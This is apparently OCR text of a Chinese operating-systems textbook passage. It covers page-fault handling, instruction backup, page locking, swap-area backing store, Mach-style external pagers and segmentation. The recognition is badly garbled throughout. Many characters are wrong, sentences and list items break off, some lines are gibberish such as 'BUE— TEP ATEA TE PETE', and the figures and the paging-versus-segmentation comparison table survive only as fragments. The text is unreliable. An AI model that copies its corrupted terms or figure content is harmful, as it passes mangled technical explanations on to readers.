样 当 新 进程 发 生 缺 页 中 断 时 ， 可 以 调 入 需要 的 页 面 。 某 些 系统 直接 从 
位 盘 上 的 可 执行 文件 对 程序 正文 进行 分 页 ， 以 市 省 亿 c 副 空间 和 初始 化 


时 间 。 最 后 ， 操 作 系统 必须 把 有 关 页 表 和 磁盘 交换 区 的 信息 存储 在 进 
程 表 中 。 


当 调 度 一 个 进程 执行 时 ， 必 须 为 新 进程 重 置 MMU， 刷 新 TLB， 以 
清除 以 前 的 进程 遗留 的 痕迹 。 新 进程 的 页 表 必 须 成 为 当前 页 表 ， 通 稼 
可 以 通过 复制 该 页 表 或 者 把 一 个 指向 它 的 指针 放 进 某 个 人 硬件 寄存 峰 来 
完成 。 有时， 在 进程 初始 化 时 可 以 把 进程 的 部 分 或 者 全 部 页 面 狠 入 内 
存 中 以 减少 缺 页 中 断 的 发 生 ， 例 如 ，PC (程序 计数 器 ) 所 指 的 页 面 肯 


定 是 需要 的 。 


当 缺 页 中 上 断 发 生 时 ， 操 作 系统 必须 通过 读 硬 件 寄存 器 来 确定 是 哪 
个 虚拟 地 址 造成 了 缺 页 中 断 。 通 过 该 信息 ， 它 要 计算 需要 哪个 页 面 ， 
并 在 磁盘 上 对 该 页 面 进行 定位 。 它 必须 找到 合适 的 页 框 来 存放 新 页 

面 ， 必 要 时 还 要 置换 老 的 页 面 ， 然 后 把 所 需 的 页 面 读 入 页 框 。 最 后 ， 
还 要 备份 程序 计数 器 ， 使 程序 计数 器 指向 引起 缺 页 中 断 的 指令 ， 并 重 
新 执行 该 指令 。 


当 进 程 退 出 的 时 候 ， 操 作 系 统 必 须 释放 进程 的 页 表 、 页 面 和 页 面 
在 便 副 上 所 占用 的 空间 。 如 有 宁 茶 些 页 面 是 与 其 他 进程 共享 的 ， 当 最 后 
一 个 使 用 它们 的 进程 终止 的 时 候 ， 才 可 以 释放 内 存 和 磁盘 上 的 页 面 。 


03.6.2 ”和 缺 页 中 断 处 理 


我 们 终于 可 以 讨论 缺 页 中 断 发 生 的 细节 了 。 缺 页 中 断 发 生 时 的 事 
件 顺序 如 下 : 


1) 硬 件 陷入 内 核 ， 在 堆栈 中 傈 存 程 序 计 数 右 。 大 多 数 机 器 将 当前 
指令 的 各 种 状态 信息 保存 在 特殊 的 CPU 寄存 郁 中 。 


2) 局 动 一 个 汇编 代码 例 程 保存 通用 寄存 部 和 其 他 易 失 的 信息 ， 以 
免 被 操作 系统 破坏 。 这 个 例 程 将 操作 系统 作为 一 个 范 数 来 调用 。 


3) 当 操作 系统 发 现 一 个 忠 页 中 断 时 ， 笑 试 发 现 需 要 哪个 虚拟 页 
面 。 通 第 一 个 硬件 寄存 器 包含 了 这 一 信息 ， 如 末 没 有 的 话 ， 控 作 系统 
必须 检索 程序 计数 郁 ， 取 出 这 条 指令 ， 用 软件 分 析 这 条 指令 ， 看 看 它 
在 缺 页 中 断 时 正在 做 什么 。 


4) 一 旦 知道 了 发 生 缺 页 中 断 的 虚拟 地 址 ， 操 作 系 统 检查 这 个 地 址 
3 有效， 并 检查 存 取 与 保护 是 否 一 致 。 如 有 果 不 一 致 ， 辐 进程 发 出 一 
东 近 该 进程 。 如 琳 地 址 有 效 且 没有 保护 错误 发 生 ， 系 统 则 检 
亲 页 框 。 如 采 没 有 空闲 页 框 ， 执 行 页 面 置换 算法 寻找 一 个 
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5) 如 采 选 择 的 页 框 < 脏 ” 了 ， 安 排 该 页 写 回 磁盘 ， 并 发 生 一 次 上 下 
文 切换 ， 挂 起 产生 缺 页 中 断 的 进程 ， 让 其 他 进程 运行 直至 磁盘 传输 结 
束 。 无 论 如 何 ， 该 页 框 被 标记 为 忙 ， 以 免 因 为 其 他 原因 而 被 其 他 进程 
= 


6) 一 旦 页 框 “干净 ”后 〈 无 论 是 立刻 还 是 在 写 回 磁盘 后 ) ， 操 作 系 
充 查 找 所 需 页 面 在 磁 强 上 的 地 址 ， 通 过 磁 表 操 作 将 其 攻 入 。 该 页 面 被 
禾 入 后 ， 产 生 缺 页 中 断 的 进程 仍然 被 挂 起 ， 并 且 如 果 有 其 他 可 运行 的 
用 户 进程 ， 则 选择 另 一 个 用 户 进程 运行 。 
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7) 当 磁盘 中 断 发 生 时 ， 表 了 明 该 页 已 经 被 又 入 ， 页 表 已 经 更 新 可 以 
反映 它 的 位 置 ， 页 框 也 被 标记 为 正常 状态 。 


8) 恢 复发 生 缺 页 中 断 指 令 以 前 的 状态 ,程序 计数 带 重 新 指向 这 条 


9) 调 度 引 发 缺 页 中 断 的 进程 ， 操 作 系统 返回 调用 它 的 汇编 语言 例 
程 。 


10) 该 例 程 恢复 寄存 硕 和 其 他 状态 信息 ， 返 回 到 用 户 裤 间 继续 执 
行 ， 融 好像 缺 页 中 断 没 有 发 生 过 一 样 。 


3.6.3 fave 


当 程序 访问 不 在 内 存 中 的 页 面 时 ， 引 起 缺 页 中 断 的 指令 会 半途 俘 
止 并 引发 操作 系统 的 陷阱 。 在 操作 系统 取出 所 需 的 页 面 后 ， 它 需要 重 
新 局 动 引 起 陷阱 的 指令 。 但 这 并 不 是 一 件 容易 实现 的 事 。 


我 们 在 最 坏 情形 下 考察 这 个 问题 的 实质 ， 考 虑 一 个 有 双 地 址 指令 
的 CPU， 比 如 Motorola 680x0， 这 是 一 种 在 舱 入 式 系 统 中 广泛 使 用 的 
CPU。 例 如 ， 指 令 


MOVE .L#6(A1),2(A0) 


为 6 字 节 ( 见 图 3-28) 。 为 了 重启 该 指令 ， 操 作 系 统 要 知道 该 指令 
第 一 个 字 市 的 位 置 。 在 陷阱 发 生 时 ， 程 序 计数 器 的 值 依赖 于 引起 缺 页 
中 断 的 那个 操作 数 以 及 CPU 中 微 指 令 的 实现 方式 。 


MOVE.L #6(A1), 2(A0) 
| 一 一 16 位 一 一 一 


1000 MOVE } 操作 码 


1002| 6 |} 第 ! 个 操作 数 


1004 [_____2____]} 82 


图 3-28 引起 缺 页 中 断 的 一 条 指令 


在 图 3-28 中 ， 从 地 址 1000 处 开始 的 指令 进行 了 3 次 内 存 访问 : 指令 
字 本 号 和 操作 数 的 2 个 偶 移 量 。 从 可 以 产生 缺 页 中 断 的 这 3 次 内 存 访问 
来 看 ， 程 序 计 数 器 可 能 在 1000、1002 和 1004 时 发 生 缺 页 中 断 ， 对 操作 
系统 来 说 要 准确 地 判断 指令 是 从 哪儿 开始 的 通常 是 不 可 能 的 。 如 果 发 
生 缺 页 中 断 时 程序 计数 器 是 1002， 操 作 系 统 无 法 弄 清 在 1002 位 置 的 字 
是 与 1000 的 指令 有 关 的 内 存 地 址 〈 比 如 ， 一 个 操作 数 的 位 置 ) ， 还 是 
一 个 指令 的 操作 码 。 


这 种 情况 已 经 很 糖 糕 了 ， 但 可 能 还 有 更 糟 的 情况 。 一 些 680x0 体 系 
结构 的 寻 址 方式 采用 目 动 增 量 ， 这 也 意味 着 执行 这 条 指令 的 副作用 是 
会 增 量 一 个 或 多 个 寄存 器 。 使 用 目 动 增 量 模式 也 可 能 引起 错误 。 这 依 
赖 于 微 指令 的 具体 实现 ， 这 种 增 量 可 能 会 在 内 存 访问 之 前 完成 ， 此 时 
操作 系统 必须 在 重 局 这 条 指令 前 将 软件 中 的 寄存 闫 减 量 。 目 动 增 量 也 
可 能 在 内 存 访问 之 后 完成 ， 此 时 ， 它 不 会 在 陷入 时 完成 而 且 不 必 由 操 
作 系统 恢复 。 目 动 减 量 也 会 出 现 相 同 的 问题 。 目 动 增 量 和 目 动 减 量 是 
个 在 相应 访 存 之 前 完成 随 痢 指令 和 CPU 模式 的 不 同 而 不 同 。 


幸运 的 是 ， 在 某 些 计算 机 上 ，CPU 的 设计 者 们 提供 了 一 种 解决 方 
法 ， 束 古 通过 使 用 一 个 隐 藏 的 内 部 寄存 占 。 在 每 条 指令 执行 之 前 ， 把 
程序 计数 占 的 内 容 复 制 到 该 寄存 囊 。 这 些 机 右 可 能 会 有 第 二 个 寄存 
器 ， 用 来 提供 哪些 寄存 器 已 经 自动 增加 或 者 自动 减少 以 及 增 减 的 数量 
等 信息 。 通 过 这 些 信息 ， 操 作 系统 可 以 消除 引起 缺 页 中 断 的 指令 所 造 


成 的 所 有 影响 ， 并 使 指令 可 以 重新 开始 执行 。 如 果 该 信息 不 可 用 ， 那 
么 操作 系统 束 要 找 出 所 发 生 的 问题 从 而 设法 来 修复 它 。 看 起 来 硬件 设 
计 者 是 不 能 解决 这 个 问题 了 ， 于 是 他 们 就 推 给 操作 系统 的 设计 者 来 解 


决 这 个 问题 。 


3.6.4 ”锁定 内 存 中 的 页 面 


尽管 本 章 对 MO 的 讨论 不 多 ， 但 计算 机 有 虚拟 内 存 并 不 意味 着 IO 
不 起 作用 了 。 虚 拟 内 存 和 IO 通过 微妙 的 方式 相互 作用 着 。 设 想 一 个 进 
程 刚 刚 通 过 系统 调用 从 文件 或 其 他 设备 中 读 取 数 据 到 其 地 址 空间 中 的 
缓冲 区 。 在 等 待 O 完 成 时 ， 该 进程 被 挂 起 ， 另 一 个 进程 被 允许 运行 ， 
而 这 个 进程 产生 一 个 缺 页 中 断 。 


如 果 分 页 算法 是 全 局 算法 ， 包 含 IO 缓 种 区 的 页 面 会 有 很 小 的 机 会 
(但 不 是 没有 ) 被 选中 换 出 内 存 。 如 果 一 个 IO 设备 正 处 在 对 该 页 面 进 
行 DMA 传 输 的 过 程 之 中 ， 将 这 个 页 面 移出 将 会 导致 部 分 数据 写 入 它们 
所 属 的 缓冲 区 中 ， 而 部 分 数据 被 写 入 到 最 新 逆 入 的 页 面 中 。 一 种 解决 
方法 是 锁 住 正在 做 WO 操作 的 内 存 中 的 页 面 以 保证 它 不 会 被 移出 内 存 。 
BUE— TEP ATEA TE PETE (pinning) 页 面 。 男 一 种 方法 十 
在 内 核 缓冲 区 中 完成 所 有 的 MO 操作 ， 然 后 再 将 数据 复制 到 用 户 页 面 。 


3.6.5 “后 备 存 储 


在 前 面 讨论 过 的 页 面 置 换算 法 中 ， 我 们 已 经 知道 了 如 何 选择 换 出 
内 存 的 页 面 。 但 是 却 没有 讨论 当 页 面 被 换 出 时 会 存放 在 磁盘 上 的 哪个 
位 置 。 现 在 我 们 讨论 一 下 磁盘 管理 相关 的 问题 。 


在 磁 弄 上 分 配 页 面 至 间 的 最 商 单 的 算法 是 在 磁 弄 上 设置 特殊 的 交 
换 分 区 ， 甚 至 从 文件 系统 划分 一 块 独立 的 磁盘 (以 平衡 WO 负载 。 大 
多 数 UNIX 征 这 样 处 理 的 。 在 这 个 分 区 里 没有 普通 的 文件 系统 ， 这 样 束 
消除 了 将 文件 偏 移 转换 成 块 地 址 的 开销 。 取 而 代 之 的 是 ， 始 终 使 用 相 
应 分 区 的 起 始 块 号 。 


当 系 统 局 动 时 ， 该 交换 分 区 为 空 ， 并 在 内 存 中 以 单独 的 项 给 出 它 
的 起 始 和 大 小 。 在 最 商 单 的 情况 下 ， 当 第 一 个 进程 启动 时 ， 留 出 与 这 
个 进程 一 样 大 的 交换 区 块 ， 剩 余 的 为 总 空间 减 去 这 个 交换 分 区 。 当 新 
进程 局 动 后 ， 它 们 同样 被 分 配 与 其 核心 映像 同等 大 小 的 交换 分 区 。 进 
程 结束 后 ， 会 释放 其 磁盘 上 的 交换 区 。 交 换 分 区 以 空 用 块 列表 的 形式 
组 织 。 更 好 的 算法 在 第 10 章 里 讨论 。 


与 每 个 进程 对 应 的 是 其 交换 区 的 磁盘 地 址 ， 即 进程 映像 所 保存 的 
地 方 。 这 一 信息 是 记录 在 进程 表 里 的 。 写 回 一 个 页 面 时 ， 计 算 写 回 地 
址 的 过 程 很 简单 : 将 虚拟 地 址 至 间 中 页 面 的 偶 移 量 加 到 交换 区 的 开始 


地 址 。 但 在 进程 局 动 前 必须 初始 化 交换 区 ， 一 种 方法 是 将 整个 进程 映 
像 复制 到 交换 区 ， 以 便 随 时 可 将 所 需 内 容 装 入 ， 另 一 种 方法 是 将 整个 
进程 装 入 内 存 ， 并 在 需要 时 换 出 。 


但 这 种 简单 模式 有 一 个 问题 : 进程 在 启动 后 可 能 增 大 ， 尽 管 程序 
正文 通常 是 固定 的 ， 但 数据 有 时 会 增长 ， 堆 栈 也 总 是 在 随时 增长 。 这 
样 ， 最 好 为 正文 、 数 据 和 堆栈 分 别 保留 交换 区 ， 并 且 人 允许 这 些 交换 区 
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男 一 个 极端 的 情况 是 事先 什么 也 不 分 配 ， 在 页 面 换 出 时 为 其 分 配 
磁盘 空间 ， 并 在 换 入 时 回收 磁 副 空间 ， 这 样 内 存 中 的 进程 不 必 国 定 于 
任何 交换 至 间 。 其 缺点 征 内 存 中 每 个 页 面 都 要 记录 相应 的 磁盘 地 址 。 
换言之 ， 每 个 进程 都 必须 有 一 张 表 ， 记 录 每 一 个 页 面 在 磁盘 上 的 位 
置 。 这 两 个 方案 如 图 3-29 所 示 。 


图 3-29 a 对 静态 交换 区 分 页 ，b) 动 态 备 份 页 面 


在 图 3-29a 中 ， 有 一 个 市 有 8 个 页 面 的 页 表 。 页 面 0、3、4 和 6 在 内 存 
中 。 页 面 1、2、5 和 7 在 磁盘 上 “。 磁 盘 上 的 交换 区 与 进程 虚拟 地 址 罕 间 
(8 页 面 ) 一 样 大 ， 每 个 页 面 有 固定 的 位 置 ， 当 它 从 内 存 中 被 淘汰 时 ， 
便 写 到 相应 位 置 。 该 地 址 的 计算 需要 知道 进程 的 分 页 区 域 的 起 始 位 
置 ， 因 为 页 面 是 按照 它们 的 虚拟 页 号 的 顺序 连续 存储 的 。 内 存 中 的 页 
面 通常 在 做 僵 上 有 镑 像 副本 ， 但 是 如 采 页 面 逆 入 后 被 修改 过 ， 那 么 这 
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的 深 色 页 面 (原则 上 ) 被 内 存 中 的 副本 所 替代 ， 但 如 果 有 一 个 内 存 页 
面 要 被 换 回 磁 玛 并 且 该 页 面 在 疼 入 内 存 后 没有 被 修改 过 ， 那 么 将 使 用 
HAP GRE) 的 副本 。 


在 图 3-29b 中 ， 页 面 在 亿 c 副 上 没有 固定 地 址 。 当 页 面 换 出 时 ， 要 太 
时 选择 一 个 空 磁 盘 页 面 并 据 此 来 更 新 磁 到 映 射 《每 个 虚拟 页 面 都 有 一 
个 磁盘 地 址 空间 ) 。 内 存 中 的 页 面 在 磁盘 上 没有 副本 。 它 们 在 磁盘 映 
射 表 中 的 表 项 包含 一 个 非法 的 磁盘 地 址 或 者 一 个 表示 它们 未 被 使 用 的 
标记 位 。 


不 能 保证 总 能够 实现 固定 的 交换 分 区 。 例 如 ， 没 有 亿 c 副 分 区 可 用 
时 。 在 这 种 情况 下 ， 可 以 利用 正 肖 文件 系统 中 的 一 个 或 多 个 较 大 的 、 
事前 定位 的 文件 。Windows 束 使 用 这 个 方法 。 然 而 ， 可 以 利用 优化 方法 
减少 所 需 的 磁盘 空间 量 。 有 既然 每 个 进程 的 程序 正文 来 自 文件 系统 中 某 


个 〈 可 执行 的 ) 文件 ， 这 个 可 执行 文件 就 可 用 作 交 换 区 。 而 更 好 的 方 
法 是 ， 由 于 程序 正文 通常 是 只 读 的 ， 当 内 存 资 源 紧张 、 程 序 页 不 得 不 
移出 内 存 时 ， 尽 管 丢 弃 它们 ， 在 需要 的 时 候 再 从 可 执行 文件 读 入 即 
可 。 共 享 库 也 可 以 用 这 个 方式 工作 。 


3.6.6 Fabs ALA ats 


控制 系统 复杂 度 的 一 种 重要 方法 就 是 把 策略 从 机 制 中 分 离 出 来 。 
通过 使 大 多 数 存 储 管理 器 作为 用 户 级 进程 运行 ， 就 可 以 把 该 原则 应 用 
到 存储 管理 中 。 在 Mach (Young 等 人 ，1987) 中 首先 应 用 了 这 种 分 
离 。 下 面 的 讨论 基本 上 是 基于 Mach 的 。 


一 个 如 何 分 离 案 略 和 机 制 的 简单 例子 可 以 参见 图 3-30。 其 中 存储 管 
理 系统 被 分 为 三 个 部 分 : 


内 存 3. 请 求 页 面 
用 户 
空间 oo 
2. 需要 的 
页 面 
内 核 
空间 


图 3-30 用 一 个 外 部 页 面 调度 程序 来 处 理 缺 页 中 断 


1) 一 个 底层 MMU 处 理 程序 。 


2) 一 个 作为 内 核 一 部 分 的 缺 页 中 断 处 理 程序 。 


3) 一 个 运行 在 用 户 空 间 中 的 外 部 页 面 调度 程序 。 


所 有 关于 MMU 工 作 的 细 市 都 被 封装 在 MMU 处 理 程 序 中 ， 该 程序 
的 代码 是 与 机 右 相 关 的 ， 而 且 操 作 系 统 每 应 用 到 一 个 新 平台 束 要 被 重 
写 一 次 。 缺 页 中 断 处 理 程序 是 与 机 器 无 关 的 代码 ， 包 含 大 多 数 分 页 机 
制 。 策 略 主要 由 作为 用 户 进程 运行 的 外 部 页 面 调度 程序 所 决定 。 


当 一 个 进程 局 动 时 ， 需 要 通知 外 部 页 面 调度 程序 以 便 建立 进程 页 
面 映射 ， 如 果 和 需要 的 话 还 要 在 磁盘 上 分 配 后 备 存 储 。 当 进程 正在 运行 
时 ， 它 可 能 要 把 新 对 象 映 射 到 它 的 地 址 空间 ， 所 以 还 要 再 一 次 通知 外 
部 页 面 调 度 程序 。 


一 旦 进程 开始 运行 ， 就 有 可 能 出 现 缺 页 中 断 。 缺 页 中 断 处 理 程 序 
找 出 需要 哪个 虚拟 页 面 ， 并 发 送 一 条 消息 给 外 部 页 面 调度 程序 告诉 它 
发 生 了 什么 问题 。 外 部 页 面 调度 程序 从 磁盘 中 读 入 所 需 的 页 面 ， 把 它 
复制 到 上 自己 的 地 址 空间 的 某 一 位 置 。 然 后 告诉 缺 页 中 断 处 理 程 序 该 页 
面 的 位 置 。 缺 页 中 断 处 理 程序 从 外 部 页 面 调度 程序 的 地 址 空间 中 清除 
该 页 面 的 映射 ， 然 后 请 求 MMU 处 理 程序 把 它 放 到 用 户 地 址 空间 的 正确 
位 置 ， 随 后 就 可 以 重新 启动 用户 进程 了 。 


这 个 实现 方案 没有 给 出 放置 页 面 置 换算 法 的 位 置 。 把 它 放 在 外 部 
页 面 调度 程序 中 比较 简单 ， 但 会 有 一 些 问 题 。 这 里 有 一 条 原则 就 是 外 


部 页 面 调度 程序 无 权 访 问 所 有 页 面 的 R 位 和 M 位 。 这 些 二 进 制 位 在 许多 
页 面 置换 算法 起 重要 作用 。 这 样 就 需要 有 某 种 机 制 把 该 信息 传递 给 外 
部 页 面 调 度 程序 ， 或 者 把 页 面 置换 算法 放 到 内 核 中 。 在 后 一 种 情况 
下 ， 缺 页 中 断 处 理 程序 会 告诉 外 部 页 面 调度 程序 它 所 选择 的 要 淘汰 的 
页 面 并 提供 数据 ， 方 法 是 把 数据 映 冉 到 外 部 页 面 调度 程序 的 地 址 空间 
中 或 者 把 它 包 含 到 一 条 消息 中 。 两 种 方法 中 ， 外 部 页 面 调 度 程序 都 把 
数据 写 到 人 磁 副 上 。 


这 种 实现 的 主要 优势 是 有 更 多 的 模块 化 代码 和 更 好 的 适应 性 。 主 
要 缺点 是 由 于 多 次 交叉“ 用 户 - 内 核 ? 边 寞 引起 的 额外 开销 ， 以 及 系统 模 
块 间 消息 传递 所 造成 的 额外 开销 。 现 在 看 来 ， 这 一 主题 有 很 多 争议 ， 
但 站 随 春 计 算 机 越 来 越 快 ， 软 件 越 来 越 复杂 ， 从 长 远 来 看 ， 对 于 大 多 
数 实 现 ， 为 了 获得 更 高 的 可 靠 性 而 牺牲 一 些 性 能 也 是 可 以 接受 的 。 
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到 目前 为 止 我 们 讨论 的 虚拟 内 存 都 是 一 维 的 ， 虚 拟 地 址 从 0 到 最 大 
地 址 ， 一 个 地 址 接着 另 一 个 地 址 。 对 许多 问题 来 说 ， 有 两 个 或 多 个 独 
立 的 地 址 空间 可 能 比 只 有 一 个 要 好 得 多 。 比 如 ， 一 个 编译 器 在 编译 过 
程 中 会 建立 许多 表 ， 其 中 可 能 包括 : 


1) 被 保存 起 来 供 打 印 清单 用 的 源 程 序 正 文 (用 于 批 处 理 系 统 ) 。 


3) 包 合用 到 的 所 有 整 型 量 和 浮 点 常量 的 表 。 
4) 语 法 分 析 树 ， 包 含 程序 语法 分 析 的 结 


5) 编 译 器 内 部 过 程 调用 使 用 的 堆栈 。 


前 4 个 表 随 着 编译 的 进行 不 断 地 增长 ， 最 后 一 个 表 在 编译 过 程 中 以 
一 种 不 可 预计 的 方式 增长 和 缩小 。 在 一 维 存 储 侨 中 ， 这 5 个 表 只 能 被 分 
配 到 虚拟 地 址 空间 中 连续 的 块 中 ， 如 图 3-31 所 示 。 


虚拟 地 址 空间 


CERA 


语法 分 析 树 


空 亲 
当前 被 语法 
分 析 树 使 用 


树 的 地 址 空间 : 
的 空间 


| 


碰撞 到 源 程 ， 


符号 表 已 经 
序 正文 表 ` 


图 3-31 在 一 维 地 址 空间 中 ， 当 有 多 个 动态 增加 的 表 时 ， 一 个 表 可 能 
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著 虚 一 下 如 采 一 个 程序 有 非常 多 的 变量 ,但 是 其 他 部 分 都 是 正 第 
数量 时 会 发 生 什 么 事情 。 地 址 空间 中 分 给 符号 表 的 块 可 能 会 被 装 满 ， 
但 这 时 其 他 表 中 还 有 大 量 的 空间 。 编 译 器 当然 可 以 简单 地 打印 出 一 条 
言 息 说 由 于 变量 太 多 编译 不 能 继续 进行 ， 但 在 其 他 表 中 还 有 空间 时 这 
样 做 似乎 并 不 恰当 。 
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中 拿 出 一 些 空间 给 拥有 极 少量 空间 的 表 。 这 种 处 理 是 可 以 做 到 的 ， 但 
征 它 和 管理 目 己 的 黎 凋 一 样 ， 在 最 好 的 情况 下 是 一 件 令 人 讨厌 的 事 ， 
而 最 坏 的 情况 则 是 一 大 堆 单 调 且 没 有 任何 回报 的 工作 。 


我 们 真正 需要 的 是 一 个 能 够 把 程序 员 从 管理 表 的 扩张 和 收缩 的 工 
作 中 解放 出 来 的 办 法 ， 束 像 虚拟 内 存 使 程序 员 不 用 再 为 怎样 把 程序 划 
分 成 履 兰 块 担心 一 样 。 


一 个 直观 并 且 通 用 的 方法 是 在 机 器 上 提供 多 个 互相 独立 的 称 为 段 
(segment) 的 地 址 空间 。 每 个 段 由 一 个 从 0 到 最 大 的 线性 地 址 序列 构 
成 。 各 个 段 的 长 度 可 以 是 0 到 某 个 允许 的 最 大 值 之 间 的 任何 一 个 值 。 不 
同 的 段 的 长 度 可 以 不 同 ， 并 且 通 常情 况 下 也 都 不 相同 。 段 的 长 度 在 运 
行 期 间 可 以 动态 改变 ， 比 如 ， 堆 栈 段 的 长 度 在 数据 被 压 入 时 会 增长 ， 
在 数据 被 弹出 时 又 会 减 小 。 


因为 每 个 段 都 构成 了 一 个 独立 的 地 址 空间 ， 所 以 它们 可 以 独立 地 
增长 或 减 小 而 不 会 影响 到 其 他 的 段 。 如 采 一 个 在 某 个 段 中 的 堆栈 需要 
更 多 的 空间 ， 它 就 可 以 立刻 得 到 所 需要 的 空间 ， 因 为 它 的 地 址 空间 中 
没有 任何 其 他 东西 阻挡 它 增 长 。 段 当然 有 可 能 会 被 狐 满 ， 但 通 肖 情况 
下 段 都 很 大 ， 因 此 这 种 情况 发 生 的 可 能 性 很 小 。 要 在 这 种 分 段 或 二 维 
的 存储 器 中 指示 一 个 地 址 ， 程 序 必须 提供 两 部 分 地 址 ， 一 个 段 号 和 一 


个 段 内 地 址 。 图 3-32 给 出 了 前 面 讨论 过 的 编译 表 的 分 段 内 存 ， 其 中 共有 
5 个 独立 的 段 。 


语法 


分 析 树 


图 3-32 分 段 存 储 管理 ， 每 一 个 段 都 可 以 独立 地 增 大 或 减 小 而 不 会 影 
咖 其 他 的 段 


需要 强调 的 是 ， 段 是 一 个 逻辑 实体 ， 程 序 员 知 道 这 一 点 并 把 它 作 
为 一 个 逻辑 实体 来 使 用 。 一 个 段 可 能 包括 一 个 过 程 、 一 个 数组 、 一 个 
堆栈 、 一 组 数值 变量 ， 但 一 般 它 不 会 同时 包含 多 种 不 同类 型 的 内 容 。 


除了 能 简化 对 长 度 经 党 变动 的 数据 结构 的 管理 之 外 ， 分 段 存 储 管 
理 还 有 其 他 一 些 优点 。 如果 每 个 过 程 都 位 于 一 个 独立 的 段 中 并 且 起 始 
地 址 是 0， 那 么 把 单独 编译 好 的 过 程 链接 起 来 的 操作 就 可 以 得 到 很 大 的 
简化 。 当 组 成 一 个 程序 的 所 有 过 程 都 被 编译 和 链接 好 以 后 ， 一 个 对 段 n 


中 过 程 的 调用 将 使 用 由 两 个 部 分 组 成 的 地 址 (mn, 0) 来 寻 址 到 字 0 (入 
口 点 ) 。 


如 采 随 后 位 于 段 n 的 过 程 被 修改 并 被 重新 编译 ， 即 使 新 版 本 的 程序 
比 老 的 要 大 ， 也 不 需要 对 其 他 的 过 程 进行 修改 (因为 没有 修改 它们 的 
起 始 地 址 ) 。 在 一 维 地 址 中 ， 过 程 被 一 个 挨 一 个 紧 紧 地 放 在 一 起 ， 中 
间 没 有 空 阶 ， 因 此 修改 一 个 过 程 的 大 小 会 影响 其 他 无 关 的 过 程 的 起 始 
地 址 ， 而 这 叉 需 要 修改 调用 了 这 些 被 移动 过 的 过 程 的 所 有 过 程 ， 以 使 
它们 的 访问 指向 这 些 过 程 的 新 地 址 。 在 一 个 有 数 百 个 过 程 的 程序 中 ， 
这 个 操作 的 开销 可 能 古 相 当 大 的 。 


分 段 也 有 助 于 在 几 个 进程 之 间 共 享 过 程 和 数据 。 这 方面 一 个 常见 
的 例子 就 是 共享 库 (shared library) 。 运 行 高 级 窗口 系统 的 现代 工作 站 
经 常 要 把 非常 大 的 图 形 库 编 译 进 几乎 所 有 的 程序 中 。 在 分 段 系 统 中 ， 
可 以 把 图 形 库 放 到 一 个 单独 的 段 中 由 各 个 进程 共 译 ， 从 而 不 再 需要 在 
每 个 进程 的 地 址 空间 中 部 保存 一 份 。 虽 然 在 纯 的 分 页 系统 中 也 可 以 有 
共 至 库 ， 但 是 它 要 复杂 得 多 ， 并 且 这 些 系 统 实 际 上 古 通 过 模拟 分 段 来 


实现 的 。 


因为 每 个 段 是 一 个 为 程序 员 所 知道 的 逻辑 实体 ， 比 如 一 个 过 程 、 
一 个 数组 或 一 个 堆栈 ， 故 不 同 的 段 可 以 有 不 同 种 类 的 你 护 。 一 个 过 程 
段 可 以 被 指明 为 只 允许 执行 ， 从 而 禁止 对 它 的 读 出 和 写 入 ; 一 个 浮 点 


数组 可 以 被 指明 为 允许 读 写 但 不 允许 执行 ， 任 何 试图 向 这 个 段 内 的 跳 
转 都 将 被 截获 。 这 样 的 剑 护 有 助 于 找到 编程 错误 。 


读者 应 该 试 着 理解 为 什么 保护 在 分 段 存 储 中 有 意义 ， 而 在 一 维 的 
分 页 存储 中 则 没有 。 在 分 段 存 储 中 用 户 知道 每 个 段 中 包含 了 什么 。 例 
如 ， 一 般 来 说 ， 一 个 段 中 不 会 既 包 含 一 个 过 程 又 包含 一 个 堆栈 ， 而 是 
只 会 包含 其 中 的 一 个 。 正 是 因为 每 个 段 只 包含 了 一 种 类 型 的 对 象 ， 所 
以 这 个 段 束 可 以 设置 针对 这 种 特定 类 型 的 合适 的 保护 。 图 3-33 对 分 段 和 
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考查 点 分 页 分 段 
需要 程序 员 了 解 正 在 使 用 这 种 技 
术 吗 ? 


存在 多 少 线性 地 址 空间 ? 


整个 地 址 空间 可 以 超出 物理 存储 器 
的 大 小 吗 ? 


过 程 和 数据 可 以 被 区 分 并 分 别 被 保 
护 吗 ? 


其 大 小 浮动 的 表 可 以 很 容易 提供 吗 ? 


用 户 间 过 程 的 共享 方便 吗 ? 


为 了 得 到 大 的 为 了 使 程序 和 数据 
线性 地 址 空间 而 | 可 以 被 划分 为 逻辑 上 
不 必 购 买 更 大 的 | 独立 的 地 址 空间 并 且 
物理 存储 器 有 助 于 共享 和 保护 


为 什么 发 明 这 种 技术 ? 


图 3-33 分 页 与 分 段 的 比较 


页 面 的 内 容 在 某 种 程度 上 是 随机 的 ， 程 序 员 甚至 察觉 不 到 分 页 的 
事实 。 尺 管 在 页 表 的 每 个 表 项 中 放 入 几 位 束 可 以 说 明 其 对 应 页 面 的 访 
问 权 限 ， 然 而 为 了 利用 这 一 点 ， 程 序 员 必 须 跟 踪 他 的 地 址 空间 中 页 面 
的 界限 。 当 初 正 是 为 了 避免 这 一 类 管理 工作 ， 人 们 才 发 明了 分 页 系 
统 。 在 分 段 系统 中 ， 由 于 用 户 会 认为 所 有 的 段 都 一 直 在 内 存 中 ， 也 职 


征 说 他 可 以 当 作 所 有 这 些 段 都 在 内 存 中 那样 去 访问 ， 他 可 以 分 别 保护 
各 个 段 ， 所 以 不 需要 关心 覆盖 它们 的 管理 工作 。 


3.7.1 纯 分 段 的 实现 


分 段 和 分 页 的 实现 本 质 上 是 不 同 的 : 页 面 是 定 长 的 而 段 不 是 。 图 3- 
34a 所 示 的 物理 内 存在 初始 时 包含 了 5 个 段 。 现 在 让 我 们 考虑 当 段 1 被 淘 
汰 后 ， 比 它 小 的 段 7 放 进 它 的 位 置 时 会 发 生 什么 样 的 情况 。 这 时 的 内 存 
配置 如 图 3-34b 所 示 ， 在 段 7 与 段 2 之 间 是 一 个 未 用 区 域 ， 即 一 个 空闲 
区 。 随 后 段 4 被 段 5 代 替 ， 如 图 3-34c 所 示 ; 段 3 被 段 6 代 奉 ， 如 图 3-34d 所 
示 。 在 系统 运行 一 段 时 间 后 内 存 补 划分 为 许多 块 ， 一 些 块 包含 着 段 ， 
一 些 则 成 了 空 亲 区 ， 这 种 现象 称 为 棋盘 形 雁 搬 或 外 部 碎片 (external 
fragmentation) 。 空 内 区 的 存在 使 内 存 被 浪费 了 ， 而 这 可 以 通过 内 存 紧 
缩 来 解决 。 如 图 3-34e 所 示 。 


图 3-34 a) EREEREER; eA ee RT 


3.7.2 “分 段 和 分 页 结合 : MULTICS 


